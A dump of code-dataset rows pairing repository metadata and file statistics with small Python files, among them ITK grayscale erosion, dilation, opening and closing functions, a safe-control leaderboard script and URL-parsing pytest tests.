| 29.076923 | 37 | 0.84127 | 64 | 378 | 4.71875 | 0.296875 | 0.291391 | 0.509934 | 0.168874 | 0.291391 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126984 | 378 | 12 | 38 | 31.5 | 0.915152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9048410a73cf63af045fbdbde34b9400153b2beb | 69 | py | Python | aplpy/setup_package.py | nbrunett/aplpy | f5d128faf3568adea753d52c11ba43014d25d90a | [
"MIT"
] | null | null | null | aplpy/setup_package.py | nbrunett/aplpy | f5d128faf3568adea753d52c11ba43014d25d90a | [
"MIT"
] | null | null | null | aplpy/setup_package.py | nbrunett/aplpy | f5d128faf3568adea753d52c11ba43014d25d90a | [
"MIT"
] | 1 | 2018-02-26T03:04:19.000Z | 2018-02-26T03:04:19.000Z | def get_package_data():
return {'aplpy.tests': ['data/*/*.hdr']}
| 23 | 44 | 0.608696 | 9 | 69 | 4.444444 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 69 | 2 | 45 | 34.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
5f3aa521fd282dfe059b73d5c7bf13c751510490 | 43 | py | Python | asteroid/filterbanks/stft_fb.py | julien-c/asteroid | 77d1b744017408b8bf4f1812e949c3c3aa4b16d3 | [
"MIT"
] | 1 | 2021-02-22T21:55:40.000Z | 2021-02-22T21:55:40.000Z | asteroid/filterbanks/stft_fb.py | julien-c/asteroid | 77d1b744017408b8bf4f1812e949c3c3aa4b16d3 | [
"MIT"
] | null | null | null | asteroid/filterbanks/stft_fb.py | julien-c/asteroid | 77d1b744017408b8bf4f1812e949c3c3aa4b16d3 | [
"MIT"
] | 1 | 2021-04-29T01:52:37.000Z | 2021-04-29T01:52:37.000Z | from asteroid_filterbanks.stft_fb import *
| 21.5 | 42 | 0.860465 | 6 | 43 | 5.833333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 43 | 1 | 43 | 43 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5fa076115c3482d09134b92ae221f6197657246e | 515 | py | Python | IPython/utils/tests/test_imports.py | pyarnold/ipython | c4797f7f069d0a974ddfa1e4251c7550c809dba0 | [
"BSD-3-Clause-Clear"
] | 1 | 2020-12-18T01:07:55.000Z | 2020-12-18T01:07:55.000Z | IPython/utils/tests/test_imports.py | pyarnold/ipython | c4797f7f069d0a974ddfa1e4251c7550c809dba0 | [
"BSD-3-Clause-Clear"
] | null | null | null | IPython/utils/tests/test_imports.py | pyarnold/ipython | c4797f7f069d0a974ddfa1e4251c7550c809dba0 | [
"BSD-3-Clause-Clear"
] | null | null | null | # encoding: utf-8
def test_import_coloransi():
from IPython.utils import coloransi
def test_import_generics():
from IPython.utils import generics
def test_import_ipstruct():
from IPython.utils import ipstruct
def test_import_PyColorize():
from IPython.utils import PyColorize
def test_import_rlineimpl():
from IPython.utils import rlineimpl
def test_import_strdispatch():
from IPython.utils import strdispatch
def test_import_wildcard():
from IPython.utils import wildcard
| 17.166667 | 41 | 0.770874 | 66 | 515 | 5.80303 | 0.242424 | 0.127937 | 0.237598 | 0.402089 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002336 | 0.168932 | 515 | 29 | 42 | 17.758621 | 0.892523 | 0.029126 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 1 | 0 | 1.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
396b885b1aee6255e728e14ce7bbe19bab7c4071 | 104 | py | Python | tests/fixtures/alert.py | Sheshtawy/hawkeye | 3f8a6002ec56edc6d60d0fb87aa6b7ee56ccfb14 | [
"MIT"
] | 1 | 2017-08-08T14:30:36.000Z | 2017-08-08T14:30:36.000Z | tests/fixtures/alert.py | Sheshtawy/hawkeye | 3f8a6002ec56edc6d60d0fb87aa6b7ee56ccfb14 | [
"MIT"
] | 45 | 2017-08-22T13:01:51.000Z | 2017-12-12T12:19:14.000Z | tests/fixtures/alert.py | Sheshtawy/hawkeye | 3f8a6002ec56edc6d60d0fb87aa6b7ee56ccfb14 | [
"MIT"
] | null | null | null | import pytest
from hawkeye.alert import Alert
@pytest.fixture
def alert():
return Alert('cpu', 20)
| 14.857143 | 31 | 0.730769 | 15 | 104 | 5.066667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022989 | 0.163462 | 104 | 6 | 32 | 17.333333 | 0.850575 | 0 | 0 | 0 | 0 | 0 | 0.028846 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
39b7468f13d7ac70b5911f60e6bc0c446aab692d | 8,157 | py | Python | plugins/morphology/grayscale.py | bsavelev/medipy | f0da3750a6979750d5f4c96aedc89ad5ae74545f | [
"CECILL-B"
] | null | null | null | plugins/morphology/grayscale.py | bsavelev/medipy | f0da3750a6979750d5f4c96aedc89ad5ae74545f | [
"CECILL-B"
] | null | null | null | plugins/morphology/grayscale.py | bsavelev/medipy | f0da3750a6979750d5f4c96aedc89ad5ae74545f | [
"CECILL-B"
] | 1 | 2022-03-04T05:47:08.000Z | 2022-03-04T05:47:08.000Z | ##########################################################################
# MediPy - Copyright (C) Universite de Strasbourg, 2011
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
import itk
import medipy.itk
from structuring_element import name_to_structuring_element
def erode(input, *args, **kwargs):
""" Gray-scale erosion of an image using a name of a structuring element and a
radius, or a structuring element.
<gui>
<item name="input" type="Image" label="Input"/>
<item name="shape" type="Enum" initializer="('ball', 'box','cross')"
label="Shape"/>
<item name="radius" type="Int" initializer="1" label="Radius"/>
<item name="output" type="Image" initializer="output=True" role="return"
label="Output"/>
</gui>
"""
if len(args) == 1 :
return erode_se(input, *args)
elif len(args) == 2 :
return erode_shape_and_radius(input, *args)
elif len(args) == 0 :
if "shape" in kwargs :
return erode_shape_and_radius(input, **kwargs)
elif "structuring_element" in kwargs :
return erode_se(input, **kwargs)
else :
raise Exception("Incorrect parameters")
else :
raise Exception("Incorrect parameters")
def erode_shape_and_radius(input, shape, radius):
""" Gray-scale erosion of an image using a name of a structuring element and a
radius
"""
structuring_element = name_to_structuring_element(shape, input.ndim, radius)
return erode_se(input, structuring_element)
def erode_se(input, structuring_element):
""" Gray-scale erosion of an image using a structuring element.
"""
itk_input = medipy.itk.medipy_image_to_itk_image(input, False)
filter = itk.GrayscaleErodeImageFilter[itk_input, itk_input, structuring_element].New(
Input=itk_input, Kernel=structuring_element)
itk_output = filter()[0]
output = medipy.itk.itk_image_to_medipy_image(itk_output, None, True)
return output
def dilate(input, *args, **kwargs):
""" Gray-scale dilation of an image using a name of a structuring element and a
radius, or a structuring element.
<gui>
<item name="input" type="Image" label="Input"/>
<item name="shape" type="Enum" initializer="('ball', 'box','cross')"
label="Shape"/>
<item name="radius" type="Int" initializer="1" label="Radius"/>
<item name="output" type="Image" initializer="output=True" role="return"
label="Output"/>
</gui>
"""
if len(args) == 1 :
return dilate_se(input, *args)
elif len(args) == 2 :
return dilate_shape_and_radius(input, *args)
elif len(args) == 0 :
if "shape" in kwargs :
return dilate_shape_and_radius(input, **kwargs)
elif "structuring_element" in kwargs :
return dilate_se(input, **kwargs)
else :
raise Exception("Incorrect parameters")
else :
raise Exception("Incorrect parameters")
def dilate_shape_and_radius(input, shape, radius):
""" Gray-scale dilation of an image using a name of a structuring element and a
radius
"""
structuring_element = name_to_structuring_element(shape, input.ndim, radius)
return dilate_se(input, structuring_element)
def dilate_se(input, structuring_element):
""" Gray-scale dilation of an image using a structuring element.
"""
itk_input = medipy.itk.medipy_image_to_itk_image(input, False)
filter = itk.GrayscaleDilateImageFilter[itk_input, itk_input, structuring_element].New(
Input=itk_input, Kernel=structuring_element)
itk_output = filter()[0]
output = medipy.itk.itk_image_to_medipy_image(itk_output, None, True)
return output
def open(input, *args, **kwargs):
""" Gray-scale opening of an image using a name of a structuring element and a
radius, or a structuring element.
<gui>
<item name="input" type="Image" label="Input"/>
<item name="shape" type="Enum" initializer="('ball', 'box','cross')"
label="Shape"/>
<item name="radius" type="Int" initializer="1" label="Radius"/>
<item name="output" type="Image" initializer="output=True" role="return"
label="Output"/>
</gui>
"""
if len(args) == 1 :
return open_se(input, *args)
elif len(args) == 2 :
return open_shape_and_radius(input, *args)
elif len(args) == 0 :
if "shape" in kwargs :
return open_shape_and_radius(input, **kwargs)
elif "structuring_element" in kwargs :
return open_se(input, **kwargs)
else :
raise Exception("Incorrect parameters")
else :
raise Exception("Incorrect parameters")
def open_shape_and_radius(input, shape, radius):
""" Gray-scale opening of an image using a name of a structuring element and a
radius
"""
structuring_element = name_to_structuring_element(shape, input.ndim, radius)
return open_se(input, structuring_element)
def open_se(input, structuring_element):
""" Gray-scale opening of an image using a structuring element.
"""
itk_input = medipy.itk.medipy_image_to_itk_image(input, False)
erode_filter = itk.GrayscaleErodeImageFilter[itk_input, itk_input, structuring_element].New(
Input=itk_input, Kernel=structuring_element)
dilate_filter = itk.GrayscaleDilateImageFilter[itk_input, itk_input, structuring_element].New(
Input=erode_filter[0], Kernel=structuring_element)
itk_output = dilate_filter()[0]
output = medipy.itk.itk_image_to_medipy_image(itk_output, None, True)
return output
def close(input, *args, **kwargs):
""" Gray-scale closing of an image using a name of a structuring element and a
radius, or a structuring element.
<gui>
<item name="input" type="Image" label="Input"/>
<item name="shape" type="Enum" initializer="('ball', 'box','cross')"
label="Shape"/>
<item name="radius" type="Int" initializer="1" label="Radius"/>
<item name="output" type="Image" initializer="output=True" role="return"
label="Output"/>
</gui>
"""
if len(args) == 1 :
return close_se(input, *args)
elif len(args) == 2 :
return close_shape_and_radius(input, *args)
elif len(args) == 0 :
if "shape" in kwargs :
return close_shape_and_radius(input, **kwargs)
elif "structuring_element" in kwargs :
return close_se(input, **kwargs)
else :
raise Exception("Incorrect parameters")
else :
raise Exception("Incorrect parameters")
def close_shape_and_radius(input, shape, radius):
""" Gray-scale closing of an image using a name of a structuring element and a
radius
"""
structuring_element = name_to_structuring_element(shape, input.ndim, radius)
return close_se(input, structuring_element)
def close_se(input, structuring_element):
""" Gray-scale closing of an image using a structuring element.
"""
itk_input = medipy.itk.medipy_image_to_itk_image(input, False)
dilate_filter = itk.GrayscaleDilateImageFilter[itk_input, itk_input, structuring_element].New(
Input=itk_input, Kernel=structuring_element)
erode_filter = itk.GrayscaleErodeImageFilter[itk_input, itk_input, structuring_element].New(
Input=dilate_filter[0], Kernel=structuring_element)
itk_output = erode_filter()[0]
output = medipy.itk.itk_image_to_medipy_image(itk_output, None, True)
return output
| 38.842857 | 98 | 0.625843 | 984 | 8,157 | 5.019309 | 0.098577 | 0.182223 | 0.061551 | 0.034015 | 0.927921 | 0.880948 | 0.852602 | 0.836404 | 0.775461 | 0.775461 | 0 | 0.004407 | 0.248866 | 8,157 | 209 | 99 | 39.028708 | 0.801697 | 0.323648 | 0 | 0.601942 | 0 | 0 | 0.052827 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116505 | false | 0 | 0.029126 | 0 | 0.378641 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
39d84094f92a331a7281c05c5714fcca5f49c6ff | 159 | py | Python | codes_/0709_To_Lower_Case.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | codes_/0709_To_Lower_Case.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | codes_/0709_To_Lower_Case.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | # %% [709. To Lower Case](https://leetcode.com/problems/to-lower-case/)
class Solution:
def toLowerCase(self, str: str) -> str:
return str.lower()
| 31.8 | 71 | 0.647799 | 22 | 159 | 4.681818 | 0.681818 | 0.135922 | 0.213592 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022901 | 0.176101 | 159 | 4 | 72 | 39.75 | 0.763359 | 0.433962 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
39e4dfcc1a8074fe3683360181257d9481806b01 | 92 | py | Python | modules/services/__init__.py | vladimir2240/orders_searcher | dac5143ec882f84ba263b5dd5a5eca1891051f3e | [
"MIT"
] | null | null | null | modules/services/__init__.py | vladimir2240/orders_searcher | dac5143ec882f84ba263b5dd5a5eca1891051f3e | [
"MIT"
] | null | null | null | modules/services/__init__.py | vladimir2240/orders_searcher | dac5143ec882f84ba263b5dd5a5eca1891051f3e | [
"MIT"
] | null | null | null | from .binance_handler import BinanceHandler
from .binance_websocket import BinanceWsWorkers
| 30.666667 | 47 | 0.891304 | 10 | 92 | 8 | 0.7 | 0.275 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 92 | 2 | 48 | 46 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
841d430b2634225f60f9d52d948e35f4f9024496 | 101 | py | Python | Nurture/server/notification/nurture/learning/agents/classification/__init__.py | nesl/EngagementService | bb8dc5a58d2038ace6467bfbcf4d253680628f67 | [
"BSD-3-Clause"
] | null | null | null | Nurture/server/notification/nurture/learning/agents/classification/__init__.py | nesl/EngagementService | bb8dc5a58d2038ace6467bfbcf4d253680628f67 | [
"BSD-3-Clause"
] | null | null | null | Nurture/server/notification/nurture/learning/agents/classification/__init__.py | nesl/EngagementService | bb8dc5a58d2038ace6467bfbcf4d253680628f67 | [
"BSD-3-Clause"
] | null | null | null | from .svm_clf import SVMClassifier
from .rf_clf import RFClassifier
from .nn_clf import NNClassifier
| 25.25 | 34 | 0.851485 | 15 | 101 | 5.533333 | 0.6 | 0.325301 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118812 | 101 | 3 | 35 | 33.666667 | 0.932584 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
84264af413796f3498efbfa6d6aa0d66e36c19c8 | 243 | py | Python | src/safegraph_eval/__init__.py | echong-SG/safegraph_eval | 8a0f3a2b3098885cbb1e6579f9de01a83779e223 | [
"Apache-2.0"
] | null | null | null | src/safegraph_eval/__init__.py | echong-SG/safegraph_eval | 8a0f3a2b3098885cbb1e6579f9de01a83779e223 | [
"Apache-2.0"
] | null | null | null | src/safegraph_eval/__init__.py | echong-SG/safegraph_eval | 8a0f3a2b3098885cbb1e6579f9de01a83779e223 | [
"Apache-2.0"
] | 1 | 2021-12-30T19:43:57.000Z | 2021-12-30T19:43:57.000Z | all = ['ingest', 'preprocessing', 'plotting', 'geometry']
from safegraph_eval.ingest import ingest
from safegraph_eval.preprocessing import preprocessing
from safegraph_eval.plotting import plotting
from safegraph_eval.geometry import geometry | 48.6 | 57 | 0.839506 | 29 | 243 | 6.896552 | 0.310345 | 0.26 | 0.34 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08642 | 243 | 5 | 58 | 48.6 | 0.900901 | 0 | 0 | 0 | 0 | 0 | 0.143443 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
842f375fdb4cb82f8998353379107e5dc35d89b0 | 6,356 | py | Python | src/leaderboard.py | intelligent-control-lab/BIS | 7df10426373696093271e9afcae0c7e8fa7be0f4 | [
"MIT"
] | 10 | 2019-07-06T06:11:45.000Z | 2021-06-23T06:07:38.000Z | src/leaderboard.py | intelligent-control-lab/BIS | 7df10426373696093271e9afcae0c7e8fa7be0f4 | [
"MIT"
] | null | null | null | src/leaderboard.py | intelligent-control-lab/BIS | 7df10426373696093271e9afcae0c7e8fa7be0f4 | [
"MIT"
] | 6 | 2019-09-09T00:47:40.000Z | 2021-09-11T12:32:06.000Z | from roc_curve import roc_curve
import numpy as np
import matplotlib
# matplotlib.use("TkAgg")
import matplotlib.pyplot as plt
def leaderboard():
"""
This function call evaluate() function to test algorithms on given parameter ranges. Parameter ranges are related to models. The parameters will be grid searched for each algorithms, and generate the roc curve by a convex hull to cover all results on the safety-efficiency plot.
"""
# models = ['Ball3D']
# settings = [ \
# # ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
# ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
# # ('SublevelSafeSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# # ('ZeroingBarrierFunction', {'d_min': [1, 2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 5]}),\
# ('PotentialField', {'d_min': [1, 2, 3], 'k_v': [0.5, 1, 2], 'c1': [1, 3, 5]}),\
# ]
# roc_curve(models, settings, True)
# models = ['Unicycle']
# settings = [ \
# # ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
# ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
# # ('SublevelSafeSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# # ('ZeroingBarrierFunction', {'d_min': [1, 2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 5]}),\
# ('PotentialField', {'d_min': [1, 2, 3], 'k_v': [0.5, 1, 2], 'c1': [1, 3, 5]}),\
# ]
# roc_curve(models, settings, True)
models = ['SCARA']
settings = [ \
('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
('SublevelSafeSet', {'d_min': [1, 2, 3], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
('ZeroingBarrierFunction', {'d_min': [2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 2, 5, 10]}),\
('PotentialField', {'d_min': [1, 2, 3], 'k_v': [0.5, 1, 2], 'c1': [1, 3, 5]}),\
]
roc_curve(models, settings, True)
# models = ['RobotArm']
# settings = [ \
# # ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
# ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
# # ('SafeSublevelSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# # ('ZeroingBarrierFunction', {'d_min': [1, 2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 5]}),\
# # ('SublevelSafeSet', {'d_min': [1, 2, 3], 'k_v': [0.25, 0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10, 20, 50, 100, 200]}),\
# ('PotentialField', {'d_min': [1, 2, 3], 'k_v': [0.5, 1, 2], 'c1': [1, 3, 5]}),\
# ]
# roc_curve(models, settings, True)
# fig, axs =plt.subplots(len(models)+1,1)
# for i,model in enumerate(models):
# print(i, model)
# algs = list(ret[model].keys())
# # safe = [x['safety'] for x in ret[model].values()]
# # effi = [x['efficiency'] for x in ret[model].values()]
# auc = list(ret[model].values())
# table = np.vstack([algs, auc]).T
# collabel=("Algorithm", "AUC")
# the_table = axs[i].table(cellText=table,colLabels=collabel,loc='center')
# plt.show()
# models = ['Ball3D']
# settings = [ \
# ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
# ('PotentialField', {'d_min': [1, 1.5, 2, 2.5, 3], 'lambd': [3, 5, 10, 15, 20]}),\
# ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
# ('SublevelSafeSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# # ('SafeSublevelSet', {'d_min': [1, 2, 3], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[0.5, 1, 2]}),\
# ('ZeroingBarrierFunction', {'d_min': [1, 2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 5]}),\
# ]
# roc_curve(models, settings, False)
# models = ['Unicycle']
# settings = [ \
# ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
# ('PotentialField', {'d_min': [1, 1.5, 2, 2.5, 3], 'lambd': [3, 5, 10, 15, 20]}),\
# ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
# ('SublevelSafeSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# ('ZeroingBarrierFunction', {'d_min': [1, 2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 5]}),\
# ]
# roc_curve(models, settings, False)
# models = ['SCARA']
# settings = [ \
# ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
# ('PotentialField', {'d_min': [1, 1.5, 2, 2.5, 3], 'lambd': [3, 5, 10, 15, 20]}),\
# ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
# ('SublevelSafeSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# ('ZeroingBarrierFunction', {'d_min': [1, 2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 5]}),\
# ]
# roc_curve(models, settings, False)
# models = ['RobotArm']
# settings = [ \
# ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
# ('PotentialField', {'d_min': [1, 1.5, 2, 2.5, 3], 'lambd': [0.1, 0.2, 0.3, 1, 2, 3]}),\
# ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
# ('SublevelSafeSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# # ('SafeSublevelSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# ('ZeroingBarrierFunction', {'d_min': [1, 2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 5]}),\
# ]
# roc_curve(models, settings, False)
if __name__ == "__main__":
leaderboard() | 59.962264 | 282 | 0.430302 | 1,022 | 6,356 | 2.577299 | 0.113503 | 0.047077 | 0.061503 | 0.071374 | 0.761959 | 0.761959 | 0.745634 | 0.745634 | 0.745634 | 0.736143 | 0 | 0.133639 | 0.27832 | 6,356 | 106 | 283 | 59.962264 | 0.440593 | 0.7972 | 0 | 0 | 0 | 0 | 0.117498 | 0.018597 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.25 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8465593828cf906c8948dc64c1ab280b476caec3 | 1,522 | py | Python | test/test_get_parts_of_url.py | moj124/web_crawler | 6169c6f59cbc74f82f59a0110f3869c300d8a0d0 | [
"MIT"
] | null | null | null | test/test_get_parts_of_url.py | moj124/web_crawler | 6169c6f59cbc74f82f59a0110f3869c300d8a0d0 | [
"MIT"
] | null | null | null | test/test_get_parts_of_url.py | moj124/web_crawler | 6169c6f59cbc74f82f59a0110f3869c300d8a0d0 | [
"MIT"
] | null | null | null | import pytest
from ..crawl_website import get_parts_of_url
@pytest.mark.parametrize("links",[
["https://www.scrapethissite.com/faq/",
"https://www.scrapethissite.com/",
"https://www.scrapethissite.com/lessons/",
"https://www.scrapethissite.com/pages/",
"https://www.scrapethissite.com/login/"]
])
def test_url_format(links):
assert get_parts_of_url(links[0]) == ('scrapethissite.com','https://www.scrapethissite.com','https://www.scrapethissite.com/faq/')
assert get_parts_of_url(links[1]) == ('scrapethissite.com','https://www.scrapethissite.com','https://www.scrapethissite.com/')
assert get_parts_of_url(links[2]) == ('scrapethissite.com','https://www.scrapethissite.com','https://www.scrapethissite.com/lessons/')
assert get_parts_of_url(links[3]) == ('scrapethissite.com','https://www.scrapethissite.com','https://www.scrapethissite.com/pages/')
assert get_parts_of_url(links[4]) == ('scrapethissite.com','https://www.scrapethissite.com','https://www.scrapethissite.com/login/')
@pytest.mark.parametrize("links",[
["/",
"/login/?2",
'#hello',
'#',
' ',
''
]
])
def test_url_endpoints(links):
assert get_parts_of_url(links[0]) == ('','://','/')
assert get_parts_of_url(links[1]) == ('','://','/login/')
assert get_parts_of_url(links[2]) == ('','://','#hello')
